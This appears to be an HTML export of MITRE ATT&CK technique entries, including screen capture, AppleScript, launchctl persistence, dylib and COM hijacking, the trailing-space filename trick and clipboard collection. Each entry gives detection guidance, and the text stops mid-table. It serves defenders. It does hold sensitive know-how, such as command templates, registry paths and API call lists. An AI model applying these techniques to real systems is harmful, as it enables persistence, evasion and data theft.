<h3 id="_screen_capture"><a class="anchor" href="#_screen_capture"></a><a class="link" href="#_screen_capture">Screen Capture</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>On OSX, the native command &lt;code&gt;screencapture&lt;/code&gt; is used to capture screenshots.</p>
</div>
<div class="paragraph">
<p>===Linux===</p>
</div>
<div class="paragraph">
<p>On Linux, there is the native command &lt;code&gt;xwd&lt;/code&gt;.[[Citation: Antiquated Mac Malware]]</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process monitoring, File monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 609. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1113">https://attack.mitre.org/wiki/Technique/T1113</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/">https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_applescript"><a class="anchor" href="#_applescript"></a><a class="link" href="#_applescript">AppleScript</a></h3>
<div class="paragraph">
<p>macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the &lt;code&gt;osalang&lt;/code&gt; program.
AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.</p>
</div>
<div class="paragraph">
<p>Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they&#8217;re already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python [[Citation: Macro Malware Targets Macs]]. Scripts can be run from the command lie via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, System calls, Process Monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 610. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1155">https://attack.mitre.org/wiki/Technique/T1155</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securingtomorrow.mcafee.com/mcafee-labs/macro-malware-targets-macs/">https://securingtomorrow.mcafee.com/mcafee-labs/macro-malware-targets-macs/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_launchctl"><a class="anchor" href="#_launchctl"></a><a class="link" href="#_launchctl">Launchctl</a></h3>
<div class="paragraph">
<p>Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made [[Citation: Sofacy Komplex Trojan]]. Running a command from launchctl is as simple as &lt;code&gt;launchctl submit -l &lt;labelName&gt;&#8201;&#8212;&#8201;/Path/to/thing/to/execute "arg" "arg" "arg"&lt;/code&gt;. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges.</p>
</div>
<div class="paragraph">
<p>Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.</p>
</div>
<div class="paragraph">
<p>Detection: Knock Knock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk somewhere which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 611. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1152">https://attack.mitre.org/wiki/Technique/T1152</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/">https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_indicator_removal_from_tools"><a class="anchor" href="#_indicator_removal_from_tools"></a><a class="link" href="#_indicator_removal_from_tools">Indicator Removal from Tools</a></h3>
<div class="paragraph">
<p>If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target&#8217;s defensive systems or subsequent targets that may use similar systems.</p>
</div>
<div class="paragraph">
<p>A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use Software Packing or otherwise modify the file so it has a different signature, and then re-use the malware.</p>
</div>
<div class="paragraph">
<p>Detection: The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process use of network, Process monitoring, Process command-line parameters, Anti-virus, Binary file metadata</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 612. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1066">https://attack.mitre.org/wiki/Technique/T1066</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dylib_hijacking"><a class="anchor" href="#_dylib_hijacking"></a><a class="link" href="#_dylib_hijacking">Dylib Hijacking</a></h3>
<div class="paragraph">
<p>macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.</p>
</div>
<div class="paragraph">
<p>A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself[[Citation: Writing Bad Malware for OSX]][[Citation: Malware Persistence on OS X]].
If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. This can be used by adversaries as a privilege escalation technique.</p>
</div>
<div class="paragraph">
<p>Detection: Objective-See&#8217;s Dylib Hijacking Scanner can be used to detect potential cases of dylib hijacking. Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: Administrator, root</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 613. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1157">https://attack.mitre.org/wiki/Technique/T1157</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf">https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf">https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_change_default_file_association"><a class="anchor" href="#_change_default_file_association"></a><a class="link" href="#_change_default_file_association">Change Default File Association</a></h3>
<div class="paragraph">
<p>When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access.[[Citation: Microsoft Change Default Programs]][[Citation: Microsoft File Handlers]] Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.</p>
</div>
<div class="paragraph">
<p>Detection: Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.</p>
</div>
<div class="paragraph">
<p>User file association preferences are stored under &lt;code&gt; [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts&lt;/code&gt; and override associations configured under &lt;code&gt;[HKEY_CLASSES_ROOT]&lt;/code&gt;. Changes to a user&#8217;s preference will occur under this entry&#8217;s subkeys.</p>
</div>
<div class="paragraph">
<p>Also look for abnormal process call trees for execution of other commands that could relate to <a id="Discovery"></a> actions or other techniques.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 614. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1042">https://attack.mitre.org/wiki/Technique/T1042</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/bb166549.aspx">http://msdn.microsoft.com/en-us/library/bb166549.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs">https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_space_after_filename"><a class="anchor" href="#_space_after_filename"></a><a class="link" href="#_space_after_filename">Space after Filename</a></h3>
<div class="paragraph">
<p>Adversaries can hide a program&#8217;s true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed[[Citation: Mac Backdoors are back]].</p>
</div>
<div class="paragraph">
<p>Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.</p>
</div>
<div class="paragraph">
<p>Detection: It&#8217;s not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user&#8217;s perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 615. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1151">https://attack.mitre.org/wiki/Technique/T1151</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/">https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_email_collection"><a class="anchor" href="#_email_collection"></a><a class="link" href="#_email_collection">Email Collection</a></h3>
<div class="paragraph">
<p>Adversaries may target user email to collect sensitive information from a target.</p>
</div>
<div class="paragraph">
<p>Files containing email data can be acquired from a user&#8217;s system, such as Outlook storage or cache files .pst and .ost.</p>
</div>
<div class="paragraph">
<p>Adversaries may leverage a user&#8217;s credentials and interact directly with the Exchange server to acquire information from within a network.</p>
</div>
<div class="paragraph">
<p>Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.</p>
</div>
<div class="paragraph">
<p>Detection: There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.</p>
</div>
<div class="paragraph">
<p>File access of local system email files for Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, File monitoring, Process monitoring, Process use of network</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 616. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1114">https://attack.mitre.org/wiki/Technique/T1114</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_information_discovery"><a class="anchor" href="#_system_information_discovery"></a><a class="link" href="#_system_information_discovery">System Information Discovery</a></h3>
<div class="paragraph">
<p>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Example commands and utilities that obtain this information include &lt;code&gt;ver&lt;/code&gt;, Systeminfo, and &lt;code&gt;dir&lt;/code&gt; within cmd for identifying information based on present files and directories.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>On Mac, the &lt;code&gt;systemsetup&lt;/code&gt; command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the &lt;code&gt;system_profiler&lt;/code&gt; gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 617. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1082">https://attack.mitre.org/wiki/Technique/T1082</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_network_connections_discovery"><a class="anchor" href="#_system_network_connections_discovery"></a><a class="link" href="#_system_network_connections_discovery">System Network Connections Discovery</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Utilities and commands that acquire this information include netstat, "net use," and "net session" with Net.</p>
</div>
<div class="paragraph">
<p>===Mac and Linux ===</p>
</div>
<div class="paragraph">
<p>In Mac and Linux, &lt;code&gt;netstat&lt;/code&gt; and &lt;code&gt;lsof&lt;/code&gt; can be used to list current connections. &lt;code&gt;who -a&lt;/code&gt; and &lt;code&gt;w&lt;/code&gt; can be used to show which users are currently logged in, similar to "net session".</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 618. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1049">https://attack.mitre.org/wiki/Technique/T1049</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_two_factor_authentication_interception"><a class="anchor" href="#_two_factor_authentication_interception"></a><a class="link" href="#_two_factor_authentication_interception">Two-Factor Authentication Interception</a></h3>
<div class="paragraph">
<p>Use of two- or multifactor authentication is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. Adversaries may target authentication mechanisms, such as smart cards, to gain access to systems, services, and network resources.</p>
</div>
<div class="paragraph">
<p>If a smart card is used for two-factor authentication (2FA), then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token.[[Citation: Mandiant M Trends 2011]]</p>
</div>
<div class="paragraph">
<p>Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors.[[Citation: Operation Emmental]]</p>
</div>
<div class="paragraph">
<p>Other hardware tokens, such as RSA SecurID, require the adversary to have access to the physical device or the seed and algorithm in addition to the corresponding credentials.</p>
</div>
<div class="paragraph">
<p>Detection: Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Contributors: John Lambert, Microsoft Threat Intelligence Center</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 619. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1111">https://attack.mitre.org/wiki/Technique/T1111</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://dl.mandiant.com/EE/assets/PDF%20MTrends%202011.pdf">https://dl.mandiant.com/EE/assets/PDF%20MTrends%202011.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_execution_through_api"><a class="anchor" href="#_execution_through_api"></a><a class="link" href="#_execution_through_api">Execution through API</a></h3>
<div class="paragraph">
<p>Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.[[Citation: Microsoft CreateProcess]]</p>
</div>
<div class="paragraph">
<p>Additional Windows API calls that can be used to execute binaries include:[[Citation: Kanthak Verifier]]</p>
</div>
<div class="paragraph">
<p>*CreateProcessA() and CreateProcessW(),
*CreateProcessAsUserA() and CreateProcessAsUserW(),
*CreateProcessInternalA() and CreateProcessInternalW(),
*CreateProcessWithLogonW(), CreateProcessWithTokenW(),
*LoadLibraryA() and LoadLibraryW(),
*LoadLibraryExA() and LoadLibraryExW(),
*LoadModule(),
*LoadPackagedLibrary(),
*WinExec(),
*ShellExecuteA() and ShellExecuteW(),
*ShellExecuteExA() and ShellExecuteExW()</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows API functions such as CreateProcess are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process monitoring</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 620. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1106">https://attack.mitre.org/wiki/Technique/T1106</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/ms682425">http://msdn.microsoft.com/en-us/library/ms682425</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://skanthak.homepage.t-online.de/verifier.html">https://skanthak.homepage.t-online.de/verifier.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_component_object_model_hijacking"><a class="anchor" href="#_component_object_model_hijacking"></a><a class="link" href="#_component_object_model_hijacking">Component Object Model Hijacking</a></h3>
<div class="paragraph">
<p>The Microsoft Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.[[Citation: Microsoft Component Object Model]] Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary&#8217;s code will be executed instead.[[Citation: GDATA COM Hijacking]] An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</p>
</div>
<div class="paragraph">
<p>Detection: There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations replacing know binary paths with unknown paths. Even though some third party applications define user COM objects, the presence of objects within &lt;code&gt;HKEY_CURRENT_USER\Software\Classes\CLSID\&lt;/code&gt; may be anomalous and should be investigated since user objects will be loaded prior to machine objects in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\&lt;/code&gt;.[[Citation: Endgame COM Hijacking]] Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, DLL monitoring, Loaded DLLs</p>
</div>
<div class="paragraph">
<p>Contributors: ENDGAME</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 621. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1122">https://attack.mitre.org/wiki/Technique/T1122</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence">https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/ms694363.aspx">https://msdn.microsoft.com/library/ms694363.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/how-hunt-detecting-persistence-evasion-com">https://www.endgame.com/blog/how-hunt-detecting-persistence-evasion-com</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_clipboard_data"><a class="anchor" href="#_clipboard_data"></a><a class="link" href="#_clipboard_data">Clipboard Data</a></h3>
<div class="paragraph">
<p>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Applications can access clipboard data by using the Windows API.[[Citation: MSDN Clipboard]]</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>OSX provides a native command, &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents [[Citation: Operating with EmPyre]].</p>
</div>
<div class="paragraph">
<p>Detection: Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 622. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
